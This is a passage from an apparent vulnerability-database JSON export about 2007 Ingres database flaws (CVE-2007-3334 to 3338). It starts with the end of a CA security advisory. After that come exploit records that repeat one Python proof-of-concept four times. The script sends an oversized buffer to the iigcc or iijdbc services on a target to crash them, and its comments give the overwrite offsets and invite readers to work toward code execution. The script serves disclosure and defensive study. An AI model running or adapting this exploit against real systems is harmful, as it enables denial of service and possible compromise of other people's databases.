document:\r\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:\r\n415738+HTMPL=kt_document_view.htmpl\r\nReported By: NGSSoftware, and iDefense\r\nNGSSoftware Advisory: \r\nhttp://www.ngssoftware.com/research/advisories/\r\niDefense Advisory: \r\nIngres Database Multiple Heap Corruption Vulnerabilities\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\r\nCVE References:\r\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\r\nOSVDB References: Pending\r\nhttp://osvdb.org/\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA\r\nTechnical Support at http://supportconnect.ca.com.\r\n\r\nFor technical questions or comments related to this advisory, \r\nplease send email to vuln AT ca DOT com.\r\n\r\nIf you discover a vulnerability in CA products, please report your\r\nfindings to vuln AT ca DOT com, or utilize our "Submit a \r\nVulnerability" form. \r\nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, 1 CA Plaza, Islandia, NY 11749\r\n \r\nContact http://www.ca.com/us/contact/\r\nLegal Notice http://www.ca.com/us/legal/\r\nPrivacy Policy http://www.ca.com/us/privacy/\r\nCopyright (c) 2007 CA. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 9.5.3 (Build 5003)\r\n\r\nwj8DBQFGe9YqeSWR3+KUGYURAvY1AJ9hZG1D3gnNiE9proluMzGi9/X21wCeKlmm\r\nfcGU0w2ZcX1NIj3oxbnOLzI=\r\n=Nzdp\r\n-----END PGP SIGNATURE-----\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2007-06-22T00:00:00", "published": "2007-06-22T00:00:00", "id": "SECURITYVULNS:DOC:17327", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17327", "title": "[Full-disclosure] [CAID 35450, 35451, 35452, 35453]: CA Products That Embed Ingres Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "cvelist": ["CVE-2007-3334", "CVE-2007-3336", "CVE-2007-6334", "CVE-2007-3337", "CVE-2007-3338"], "description": "Multiple heap buffers overflows on TCP/10916 and TCP/10923 requests parsing. Local unauthorized files access with 'wakeup'. Buffer overflow in uuid_from_char() SQL function, privilege escalation.", "edition": 1, "modified": "2007-12-24T00:00:00", "published": "2007-12-24T00:00:00", "id": "SECURITYVULNS:VULN:7841", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7841", "title": "Ingres database / CA security products multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:57:07", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3336", "CVE-2007-3338"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69601", "id": "SSV:69601", "sourceData": "\n # Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC\r\n# Date: 2010-08-14\r\n# Author: fdisk (@fdiskyou)\r\n# e-mail: fdiskyou at deniable.org\r\n# Version: 2.6\r\n# Tested on: Windows 2003 Server SP1 en\r\n# CVE: CVE-2007-3336 - CVE-2007-3338\r\n# Notes: Fixed in the last version.\r\n# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing\r\n# MOV EAX,DWORD PTR DS:[EDX+8]\r\n# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing \r\n# CMP ECX,DWORD PTR DS:[EDI+4]\r\n# please let me know if you are/were able to get code execution\r\n\r\nimport socket\r\nimport sys\r\n\r\nif len(sys.argv) != 4:\r\n print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"\r\n print "Vulnerable Services: iigcc, iijdbc"\r\n sys.exit(1)\r\n\r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\nservice = sys.argv[3]\r\n\r\nif service == "iigcc":\r\n payload = "\\x41" * 2106\r\nelif service == "iijdbc":\r\n payload = "\\x41" * 1066\r\nelse:\r\n print "Vulnerable Services: iigcc, iijdbc"\r\n sys.exit(1)\r\n\r\npayload += "\\x42" * 4\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((host, port))\r\nprint "Sending payload"\r\ns.send(payload)\r\ndata = s.recv(1024)\r\ns.close()\r\nprint 'Received', repr(data)\r\n\r\nprint service + " crashed"\r\n\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69601"}, {"lastseen": "2017-11-19T16:44:47", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Ingress Database Server 2.6 - Multiple Remote Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3334", "CVE-2007-3336", "CVE-2007-3337", "CVE-2007-3338"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-83664", "id": "SSV:83664", "sourceData": "\n source: http://www.securityfocus.com/bid/24585/info\r\n\r\nIngress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.\r\n\r\nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.\r\n\r\n# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\r\n# Date: 2010-08-14\r\n# Author: fdisk\r\n# Version: 2.6\r\n# Tested on: Windows 2003 Server SP1 en\r\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\r\n# Notes: Fixed in the last version.\r\n# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>\r\n\r\nimport socket\r\nimport sys\r\n\r\nif len(sys.argv) != 4:\r\n print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"\r\n print "Vulnerable Services: iigcc, iijdbc"\r\n sys.exit(1)\r\n\r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\nservice = sys.argv[3]\r\n\r\nif service == "iigcc":\r\n payload = "\\x41" * 2106\r\nelif service == "iijdbc":\r\n payload = "\\x41" * 1066\r\nelse:\r\n print "Vulnerable Services: iigcc, iijdbc"\r\n sys.exit(1)\r\n\r\npayload += "\\x42" * 4\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((host, port))\r\nprint "Sending payload"\r\ns.send(payload)\r\ndata = s.recv(1024)\r\ns.close()\r\nprint 'Received', repr(data)\r\n\r\nprint service + " crashed"\r\n\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83664"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:07", "description": "\nCA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)", "edition": 1, "published": "2010-08-14T00:00:00", "title": "CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3336", "CVE-2007-3338"], "modified": "2010-08-14T00:00:00", "id": "EXPLOITPACK:DAAC4C42D5378F08D46B31B383CA6A3B", "href": "", "sourceData": "# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC\n# Date: 2010-08-14\n# Author: @fdiskyou\n# e-mail: rui at deniable.org\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3336 - CVE-2007-3338\n# Notes: Fixed in the last version.\n# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing\n# MOV EAX,DWORD PTR DS:[EDX+8]\n# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing \n# CMP ECX,DWORD PTR DS:[EDI+4]\n# please let me know if you are/were able to get code execution\n\nimport socket\nimport sys\n\nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n\nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n\nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n\npayload += \"\\x42\" * 4\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint 'Received', repr(data)\n\nprint service + \" crashed\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:21", "description": "\nIngress Database Server 2.6 - Multiple Remote Vulnerabilities", "edition": 1, "published": "2007-06-21T00:00:00", "title": "Ingress Database Server 2.6 - Multiple Remote Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3334", "CVE-2007-3336", "CVE-2007-3337", "CVE-2007-3338"], "modified": "2007-06-21T00:00:00", "id": "EXPLOITPACK:215A9E0E73AB212DC489033AC4E72DB6", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/24585/info\n\nIngress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.\n\nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.\n\n# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version.\n# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>\n\nimport socket\nimport sys\n\nif len(sys.argv) != 4:\n print \"Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>\"\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n\nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n\nif service == \"iigcc\":\n payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n payload = \"\\x41\" * 1066\nelse:\n print \"Vulnerable Services: iigcc, iijdbc\"\n sys.exit(1)\n\npayload += \"\\x42\" * 4\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint 'Received', repr(data)\n\nprint service + \" crashed\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:59", "description": "", "published": "2010-08-17T00:00:00", "type": "packetstorm", "title": "Computer Associates Advantage Ingres 2.6 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3334", "CVE-2007-3336", "CVE-2007-3337", "CVE-2007-3338"], "modified": "2010-08-17T00:00:00", "id": "PACKETSTORM:92818", "href": "https://packetstormsecurity.com/files/92818/Computer-Associates-Advantage-Ingres-2.6-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities \n# Date: 2010-08-14 \n# Author: fdisk \n# Version: 2.6 \n# Tested on: Windows 2003 Server SP1 en \n# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338 \n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com> \n \nimport socket \nimport sys \n \nif len(sys.argv) != 4: \nprint \"Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>\" \nprint \"Vulnerable Services: iigcc, iijdbc\" \nsys.exit(1) \n \nhost = sys.argv[1] \nport = int(sys.argv[2]) \nservice = sys.argv[3] \n \nif service == \"iigcc\": \npayload = \"\\x41\" * 2106 \nelif service == \"iijdbc\": \npayload = \"\\x41\" * 1066 \nelse: \nprint \"Vulnerable Services: iigcc, iijdbc\" \nsys.exit(1) \n \npayload += \"\\x42\" * 4 \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((host, port)) \nprint \"Sending payload\" \ns.send(payload) \ndata = s.recv(1024) \ns.close() \nprint 'Received', repr(data) \n \nprint service + \" crashed\" \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/92818/caadvantageingres-dos.txt"}]}